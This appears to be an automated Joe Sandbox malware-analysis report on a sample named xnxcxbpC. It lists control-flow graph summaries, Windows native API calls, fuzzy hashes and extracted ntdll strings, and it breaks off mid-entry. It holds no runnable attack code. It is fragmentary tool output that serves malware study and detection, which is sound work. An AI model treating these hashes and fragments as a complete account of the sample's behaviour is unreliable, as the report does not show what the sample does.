                                                                  • Snapshot File: hcaresult_5_1_400000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                  • API String ID: 0-3667867154
                                                                  • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                  • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                  • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                  • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 92 417b33-417b4f 93 417b57-417b5c 92->93 94 417b52 call 42f7c3 92->94 95 417b62-417b70 call 42fdc3 93->95 96 417b5e-417b61 93->96 94->93 99 417b80-417b91 call 42e263 95->99 100 417b72-417b7d call 430063 95->100 105 417b93-417ba7 LdrLoadDll 99->105 106 417baa-417bad 99->106 100->99 105->106
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                  • Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
                                                                  • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                  • Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 130 42cb13-42cb4f call 404973 call 42dd63 NtClose
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                  • Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
                                                                  • Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                  • Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 144 22ab2b60-22ab2b6c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dd9571ac28c733c7bcbc6ab0b6c2ab2e0785c7c3f45f6a7cea9b37ccab5c56bd
                                                                  • Instruction ID: 3e2a582f566819f0d7dc075396df069414b6438acd4fee06891aad99f2c57742
                                                                  • Opcode Fuzzy Hash: dd9571ac28c733c7bcbc6ab0b6c2ab2e0785c7c3f45f6a7cea9b37ccab5c56bd
                                                                  • Instruction Fuzzy Hash: EA90026120250007410671594454616401A57E0201B96C021E1014590DC52689916125

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 145 22ab2c70-22ab2c7c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dcd187a13fb2459bf97011d554ed1d9e6f37f847e0a0eb9209795977ca5ab75a
                                                                  • Instruction ID: 9cbe8ae56b295f2d43ea85737e34c4a4e2d63953deb6592a227a43622d1205d8
                                                                  • Opcode Fuzzy Hash: dcd187a13fb2459bf97011d554ed1d9e6f37f847e0a0eb9209795977ca5ab75a
                                                                  • Instruction Fuzzy Hash: 3D90023120158806D1117159844474A001557D0301F9AC411A4424658D869689917121

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 146 22ab2df0-22ab2dfc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 5b32031464b086be9b95c9891b5efb3fff47fd0469e090bbac7f24a6c3543dd8
                                                                  • Instruction ID: fa6116f961562e45fceff7bdeafc4ecca193b73543c062efa5fbf8f9cd8562f6
                                                                  • Opcode Fuzzy Hash: 5b32031464b086be9b95c9891b5efb3fff47fd0469e090bbac7f24a6c3543dd8
                                                                  • Instruction Fuzzy Hash: 1D90023120150417D11271594544707001957D0241FD6C412A0424558D96578A52A121
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 1d2d59ae8a75f3d6999665f555e0e3ceb56948f9ed6f9de08992a810d1c2b431
                                                                  • Instruction ID: 936876fa1c4abbae62a797e467372cd65971d2a340836cf56ac0310a7c9e46c4
                                                                  • Opcode Fuzzy Hash: 1d2d59ae8a75f3d6999665f555e0e3ceb56948f9ed6f9de08992a810d1c2b431
                                                                  • Instruction Fuzzy Hash: 5E90023160560406D10171594554706101557D0201FA6C411A0424568D87968A5165A2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 401af2-401b18 1 401b20-401b33 0->1 1->1 2 401b35-401b51 call 4010e0 1->2 5 401b56-401b5c 2->5 5->5 6 401b5e-401b82 call 401d70 5->6 9 401b87-401b8d 6->9 9->9 10 401b8f-401b9e 9->10 11 401ba3-401ba4 10->11 11->11 12 401ba6-401bab 11->12 13 401bb0-401bc1 12->13 13->13 14 401bc3-401bd8 13->14 14->14 15 401bda-401bdf 14->15 16 401be0-401bf1 15->16 16->16 17 401bf3-401c19 EntryPoint 16->17 18 401c20-401c26 17->18 18->18 19 401c28 call 430153 18->19 20 401c2a-401c2d 19->20 21 401c32-401c45 20->21 21->21 22 401c47-401c4c 21->22 23 401c50-401c61 22->23 23->23 24 401c63-401c78 23->24
                                                                  APIs
                                                                  • EntryPoint.XNXCXBPC(?,0000032C,?), ref: 00401BFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EntryPoint
                                                                  • String ID: a```
                                                                  • API String ID: 3225343992-3259403941
                                                                  • Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                  • Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
                                                                  • Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                  • Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 26 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID: whA
                                                                  • API String ID: 3298025750-33568622
                                                                  • Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                  • Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
                                                                  • Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                  • Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 70 417bb3-417bc4 71 417b81-417b83 70->71 72 417bc6-417bd3 70->72 73 417b89-417b91 71->73 74 417b84 call 42e263 71->74 75 417bd5-417bd6 72->75 76 417bd7-417bde 72->76 77 417b93-417ba7 LdrLoadDll 73->77 78 417baa-417bad 73->78 74->73 75->76 79 417be1-417be7 76->79 77->78 80 417be9 79->80 81 417bed-417bf5 79->81 82 417bea 80->82 83 417c5f-417c64 80->83 84 417bfa-417c03 81->84 82->84 87 417beb-417bec 82->87 85 417c41-417c55 83->85 86 417c66-417c6f 83->86 84->85 85->79 89 417c57-417c58 85->89 90 417c71-417c91 86->90 87->81 89->90 91 417c5a-417c5e 89->91 91->83
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                  • Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
                                                                  • Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                  • Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 107 417b27-417b30 108 417b90-417ba7 LdrLoadDll 107->108 109 417b32-417b5c call 42f7c3 107->109 110 417baa-417bad 108->110 114 417b62-417b70 call 42fdc3 109->114 115 417b5e-417b61 109->115 118 417b80-417b91 call 42e263 114->118 119 417b72-417b7d call 430063 114->119 118->110 124 417b93-417ba7 LdrLoadDll 118->124 119->118 124->110
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                  • Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
                                                                  • Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                  • Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 125 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                  • Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
                                                                  • Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                  • Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 135 42cec3-42ceff call 404973 call 42dd63 ExitProcess
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                  • Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
                                                                  • Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                  • Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 140 22ab2c0a-22ab2c0f 141 22ab2c1f-22ab2c26 LdrInitializeThunk 140->141 142 22ab2c11-22ab2c18 140->142
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b38c96bce58053d23d91fcec307f6ef5f6293c45884fc8a8da5d850094bb2da9
                                                                  • Instruction ID: b4c6cf1f1d4cc7d39a3024dd9a32ffe5d16a7b65129b755db83b9422d58af0a0
                                                                  • Opcode Fuzzy Hash: b38c96bce58053d23d91fcec307f6ef5f6293c45884fc8a8da5d850094bb2da9
                                                                  • Instruction Fuzzy Hash: 4BB09B719016C5C9D601E7604B487077A147BD1702F56C072D2030681F4779C5D1F175
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2160512332
                                                                  • Opcode ID: 54e6c44e1641107069be795fdba8bcf8616f008ab2fb54c984bdc5b1fc306100
                                                                  • Instruction ID: b3d7c57713d4a82731dac4877e1f3d6013936c59f0ac8b7e476aeb27bed290e3
                                                                  • Opcode Fuzzy Hash: 54e6c44e1641107069be795fdba8bcf8616f008ab2fb54c984bdc5b1fc306100
                                                                  • Instruction Fuzzy Hash: 34929D71644781ABE721CF24C980F6BB7E8BF84754F00492DFA94DBA90D7B9D844CB92
                                                                  Strings
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 22AE5543
                                                                  • undeleted critical section in freed memory, xrefs: 22AE542B
                                                                  • Thread identifier, xrefs: 22AE553A
                                                                  • corrupted critical section, xrefs: 22AE54C2
                                                                  • 8, xrefs: 22AE52E3
                                                                  • Critical section debug info address, xrefs: 22AE541F, 22AE552E
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 22AE54CE
                                                                  • Invalid debug info address of this critical section, xrefs: 22AE54B6
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 22AE54E2
                                                                  • Critical section address, xrefs: 22AE5425, 22AE54BC, 22AE5534
                                                                  • Address of the debug info found in the active list., xrefs: 22AE54AE, 22AE54FA
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 22AE540A, 22AE5496, 22AE5519
                                                                  • double initialized or corrupted critical section, xrefs: 22AE5508
                                                                  • Critical section address., xrefs: 22AE5502
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: 29849cf4587625664dce5acdfe84f7a73d1151cf40fc949164a0ee12c54ea0e7
                                                                  • Instruction ID: 68b20a93912d020be2bae66db154fd3809c171bdb2172026331c1f49bb1a39b1
                                                                  • Opcode Fuzzy Hash: 29849cf4587625664dce5acdfe84f7a73d1151cf40fc949164a0ee12c54ea0e7
                                                                  • Instruction Fuzzy Hash: F0816B71E00358AFEB10CF95C980FAEBBB5BF08714F504169F909B7A80D775A981CBA0
                                                                  Strings
                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 22AE24C0
                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 22AE2412
                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 22AE2498
                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 22AE261F
                                                                  • @, xrefs: 22AE259B
                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 22AE22E4
                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 22AE2602
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 22AE25EB
                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 22AE2409
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 22AE2624
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 22AE2506
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                  • API String ID: 0-4009184096
                                                                  • Opcode ID: 5f53b86188ababccbe7189a4c12dbf3e47e0e7f283278f7c68cdba296fca6f8f
                                                                  • Instruction ID: e29d5044ace29b7686232267f6e4ea1bfebfe51a20acd4762561ed52c49de0a1
                                                                  • Opcode Fuzzy Hash: 5f53b86188ababccbe7189a4c12dbf3e47e0e7f283278f7c68cdba296fca6f8f
                                                                  • Instruction Fuzzy Hash: 62024CF1D403289BDB21CF14CD90B9AB7B8AF54304F1041EAA60DA7641EBB19F95CF69
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  • API String ID: 0-2515994595
                                                                  • Opcode ID: 28db57a08d6f7420c75c4856c2dbd23338ab9ebea0700b0f413d5bba576ec302
                                                                  • Instruction ID: 5dba48e2f6dd8d55fc5f47db54bf42226c27d74f29f6d3a5e1c7398ee7b61dfb
                                                                  • Opcode Fuzzy Hash: 28db57a08d6f7420c75c4856c2dbd23338ab9ebea0700b0f413d5bba576ec302
                                                                  • Instruction Fuzzy Hash: E351BFB16053859BEB25CF148A80BABB7FCFF94344F904A1DEA58C3651EB70D644CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  • API String ID: 0-1700792311
                                                                  • Opcode ID: 729f9445f1f1dce2d128b69271c61e540284a9b0af21fe6e3f665d39b61b1978
                                                                  • Instruction ID: f3cb1d312ed9630137ddf23780acb2c27906ad754611142e5b704aea7457184b
                                                                  • Opcode Fuzzy Hash: 729f9445f1f1dce2d128b69271c61e540284a9b0af21fe6e3f665d39b61b1978
                                                                  • Instruction Fuzzy Hash: 54D1E131600B85DFDB12CF64C580ABDBBF1FF6A704F048A59E8599BA6AC735D981CB10
                                                                  Strings
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 22AF8B8F
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 22AF8A3D
                                                                  • HandleTraces, xrefs: 22AF8C8F
                                                                  • VerifierDlls, xrefs: 22AF8CBD
                                                                  • VerifierFlags, xrefs: 22AF8C50
                                                                  • VerifierDebug, xrefs: 22AF8CA5
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 22AF8A67
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  • API String ID: 0-3223716464
                                                                  • Opcode ID: 38d89a0e4b5ade65e34386f93378e274c0e03f1865e489d875e39ffe75d8c64a
                                                                  • Instruction ID: b75edba17cabff1a57a7b775dde002004871743165eaf10b582d3e979db388ae
                                                                  • Opcode Fuzzy Hash: 38d89a0e4b5ade65e34386f93378e274c0e03f1865e489d875e39ffe75d8c64a
                                                                  • Instruction Fuzzy Hash: 27910472686701AFD311DF28CAC0F2A77A4BF54794F910958FB80ABA94C73E9C11CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                  • API String ID: 0-1109411897
                                                                  • Opcode ID: 7db1a537bce332aebd82d3f399d2a4557cdcc47d2ab7ee08c7f43f1b305f5b97
                                                                  • Instruction ID: 9df37c2b1be1d24e22f80bb4785bc423b6d6e3157f6b1f8de89fff405470fea1
                                                                  • Opcode Fuzzy Hash: 7db1a537bce332aebd82d3f399d2a4557cdcc47d2ab7ee08c7f43f1b305f5b97
                                                                  • Instruction Fuzzy Hash: 99A23675A0576A8BDB68CF19CE98BADB7B1BF44304F1042E9D918A7A50DB309E84CF44
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000001.2240612086.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_1_400000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$VUUU$^$gfff$gfff$yxxx
                                                                  • API String ID: 0-316815425
                                                                  • Opcode ID: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                  • Instruction ID: acdc47fa774a7f9690a8a9d900611673f9bdcf880e58a562d9d8aaaed250525f
                                                                  • Opcode Fuzzy Hash: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                  • Instruction Fuzzy Hash: 6B81D471B005054BDF2CCD5DDA987AA73A6EBD4304F28817AD809EF3D1EA799E058A44
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
